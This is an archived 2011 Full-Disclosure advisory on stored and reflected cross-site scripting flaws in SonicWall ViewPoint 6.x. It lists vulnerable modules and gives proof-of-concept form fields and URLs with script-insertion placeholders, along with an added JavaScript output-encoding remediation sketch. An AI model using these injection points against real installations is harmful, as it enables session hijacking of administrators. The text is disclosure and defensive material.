List: full-disclosure
Subject: [Full-disclosure] Sonicwall Viewpoint v6.x - Multiple Web
From: "research () vulnerability-lab ! com" <research () vulnerability-lab ! com>
Date: 2011-09-26 3:19:37
Message-ID: 4E7FEF49.7080905 () vulnerability-lab ! com
Title:
======
Sonicwall Viewpoint v6.x - Multiple Web Vulnerabilities
Date:
=====
2011-09-26
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=195
VL-ID:
=====
195
Introduction:
=============
SonicWALL® ViewPoint™ is an easy-to-use, web-based reporting tool that fully supports and extends SonicWALL's security products and services. It can be deployed flexibly as software or as a virtual appliance. Comprehensive reporting capabilities give administrators immediate insight into the health, performance and security of their network. With the customizable dashboard and a wide range of historical reports, SonicWALL ViewPoint helps organizations of all sizes monitor network usage and security activity and view web usage.
(Copy of the Vendor Homepage: http://www.sonicwall.com/de/Centralized_Management_and_Reporting.html)
Abstract:
=========
The Vulnerability-Lab Team discovered multiple input validation vulnerabilities in SonicWall's Viewpoint appliance/application.
Report-Timeline:
================
2011-05-16: Vendor Notification
2011-06-21: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2011-09-26: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
Sonicwall Viewpoint v6.x & older versions
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
1.1
Multiple persistent input validation vulnerabilities were detected in SonicWall's Viewpoint & global management application. The persistent vulnerabilities allow a local low-privileged user account to manipulate specific application modules or content requests.
Vulnerable Module(s): (Persistent)
[+] SonicWall Training (Title; RSS_URL; Logs Mail)
[+] Current Sessions (Title)
[+] Add Component
[+] Report Layout / Template
[+] Scheduled Reports
[+] Security Dashboard
[+] Custom Report – Website Filtering
[+] SonicWall Today
[+] SonicToday Pagetitle
[+] SonicToday log title
1.2
Multiple non-persistent input validation vulnerabilities were detected in SonicWall's Viewpoint & global management application. The non-persistent vulnerabilities allow a remote attacker to hijack customer/admin sessions, with a high level of required user interaction.
Vulnerable Module(s): (Non Persistent)
[+] FTP Usage / Top Users of FTP / Web Usage Top Sites
[+] Show Logs
[+] Description
[+] Security Dashboard
Picture(s):
../ive1.png
../ive2.png
../ive3.png
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts.
For demonstration or to reproduce ...
Section: Top FTP Users
<input type=hidden name="reportType" value="singleday_report" />
<input type=hidden name="wrapped" value=">"<INSERT YOUR SCRIPTCODE HERE!>" />
<input type=hidden name="updatePerm" value="1" />
<input type=hidden name="node_id" value="UT1258498415223005056BA2A2D" />
<input type=hidden name="t" value="Reports_FTPUsage_ByUser_Snwls" />
<input type=hidden name="level" value="3" />
<input type=hidden name="r" value="60" />
<input type=hidden name="page" value="reports/topTenReport.jsp" />
<input type=hidden name="p" value="7640" />
<input type=hidden name="action" value="showPage" />
<input type=hidden name="report_id" value="180" />
<input type=hidden name="help_url" value="http://help.xxx.com/help.asp?l=<INSERT YOUR SCRIPTCODE HERE!>" />
<input type=hidden name="unused" value="1" />
<input type=hidden name="isTimeBasedReport" value="0" />
<input type="hidden" name="bidirection" value="0">
Section: License Viewpoint
<form method="post" action="login.jsp">
<input type="hidden" name="login" value="1"/>
<input type="hidden" name="url" value="/stats/pdf?sn=<INSERT YOUR SCRIPTCODE HERE!>
<input type="hidden" name="sn" value=">"<INSERT YOUR SCRIPTCODE HERE!>"/>
Username: <input type="text" name="userName"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>
createDataBox(unescape(''),'','logs','2','284','5','5','Logs"><h1><INSERT SCRIPTCODE HERE!><"','DBC1269337065018005056BA2A2D','0','3','1','null'); <-- ;)
References: [x] <=
http://viewpoint.xxx.com/sgms/granular_report?action=view_report_action&template_id=100&config_id=7&config_name=facebook&node_id=UT1258498415223005056BA2A2D&successURL=
http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/topTenReport.jsp&report_id=180&level=3&node_id=UT1258498415223005056BA2A2D&unused=1&updatePerm=1&help_url=http://help.xxx.com/help.asp?l=eng&t=Reports_FTPUsage_ByUser_Snwls&p=7640&r=60&wrapped=
http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/loginReport.jsp&level=3&node_id=UT1258498415223005056BA2A2D&firewall_reports_id=4327&report_id=310&sortCol=%20Time%20&sortOrder=1&total_records=1287&chartType=null&displayType=[x]&record_offset=
http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/logviewer/showlog2.jsp?serial_number=0017C51036B8&level=3&node_id=null&firewall_reports_id=0&report_id=null&sortCol=Dst%20Interface&sortOrder=0&total_records=397804&chartType=
http://lmdashboard.xxx.com/stats/pdf?sn=
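Remediation sketch for the sinks shown in the proof of concept above (added example, not part of the original advisory and not SonicWALL code): each value is encoded for the context it is written into, namely an HTML attribute, a URL query parameter inside an attribute, and a JavaScript string argument. The function names and the sample value are assumptions made for illustration; help.xxx.com is the placeholder host used in the advisory.

```javascript
// Added example, not SonicWALL code. Output encoders for the three sinks
// that appear in the proof of concept: an HTML attribute value, a URL query
// parameter inside an attribute, and a JavaScript string argument.

// HTML attribute/element context: neutralise quote and tag delimiters.
const HTML_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_MAP[c]);
}

// JavaScript string-literal context inside an inline script: everything
// outside a small safe set becomes \uXXXX, so neither the closing quote nor
// a "</script>" sequence survives.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 _.,-]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hidden form field such as "wrapped" or "sn": always quoted, always encoded.
function renderHiddenInput(name, value) {
  return `<input type="hidden" name="${encodeHtmlAttr(name)}" value="${encodeHtmlAttr(value)}" />`;
}

// help_url carries user data in its query string: percent-encode the
// parameter first (URL context), then encode the whole URL for the attribute.
function renderHelpUrl(lang) {
  const url = 'http://help.xxx.com/help.asp?l=' + encodeURIComponent(lang);
  return renderHiddenInput('help_url', url);
}

// Quoted literal for a script argument such as the data box title.
function renderJsArg(value) {
  return "'" + encodeJsString(value) + "'";
}

// Constructed, inert sample input using the quote/bracket breakout shape.
const SAMPLE = '">"<i>constructed-marker</i>';

console.log(renderHiddenInput('wrapped', SAMPLE));
console.log(renderHelpUrl(SAMPLE));
console.log(renderJsArg('Logs' + SAMPLE));
```

For the persistent cases the same encoders apply at render time, when the stored title or URL is written back into a page, not only when the value is first submitted.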
Risk:
=====
The security risk of the persistent vulnerabilities is estimated as medium(+).
The security risk of the non-persistent vulnerabilities is estimated as low.
Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2011|Vulnerability-Lab
--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/